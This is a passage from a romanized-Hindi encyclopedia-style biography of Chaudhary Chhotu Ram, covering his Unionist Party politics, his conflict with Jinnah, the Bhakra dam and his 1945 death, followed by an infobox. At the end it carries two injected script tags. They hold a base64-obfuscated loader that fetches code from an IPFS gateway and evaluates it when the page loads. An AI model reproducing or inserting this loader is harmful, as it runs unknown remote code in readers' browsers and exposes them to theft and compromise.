ka is tarah jabaradast uttar diya.

san 1942 mean sar sikandar khan ka dehaant ho gaya aur khijr hayat khan tivana ne panjab ki rajasatta sanbhali. udhar muhammad ali jinna ne 1944 mean lahaur mean sar khijr hayat par dabav dala ki chaudhari chhotooram ka dabadaba kam kiya jae aur panjab ki yooniyanist sarakar ka lebal hatakar ise muslim lig ka nam diya jae. kyoanki sar chhotooram abdul kalam azad ki nitiyoan ke samarthak the, muhammad ali jinna aur chaudhari chhotooram sidhe takarav ki sthiti mean a ge. ab to chaudhari chhotooram ki parti ke samane muslim lig aur kaangres donoan hi chunauti ban gee thian. lekin pahale aur doosare mahayuddh mean chaudhari chhotooram dvara kaangres ke virodh ke bavajood sainikoan ki bharti se aangrez b de khush the. aangrezoan ne hariyana ke ilake ki vaphadariyoan se khush hokar hariyana nivasiyoan ko vachan diya ki bhakh da par baandh banakar sataluj nadi ka pani hariyana ko diya jaega. sar chhotooram ne hi bhakh da baandh ka prastav rakha tha. sataluj ke pani ka adhikar bilasapur ke raja ka tha. jhajjar ke mahan sapoot ne bilasapur ke raja ke sath ek samajhaute par hastakshar kie.

mrityu

san 1924 se 1945 tak panjab ki rajaniti ke akele soory chaudhari chhotooram ka 9 janavari, 1945 ko dehavasan ho gaya aur ek kraantikari yug ka yah soory doob gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

chhotooram
poora nam ray richhapal (mool nam)
janm 24 navambar, 1881
janm bhoomi rohatak
mrityu 9 janavari, 1945
mrityu sthan lahaur
abhibhavak pita- sukhiram
nagarikata bharatiy
prasiddhi svatantrata senani tatha rajanitijn
parti yooniyanist parti
vishesh chaudhari chhotooram ki lekhani ag ugalati thi. 'thag bajar ki sair' aur 'bechara kisan' ke lekhoan mean se 17 lekh 'jat gajat' mean chhape the.
any janakari agast, 1920 mean chhotooram ne kaangres chho d di thi, kyoanki ve gaandhi ji ke asahayog aandolan se sahamat nahian the. unaka vichar tha ki is aandolan se kisanoan ka hit nahian hoga. unaka mat tha ki azadi ki l daee sanvaidhanik tarike se l di jaye.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>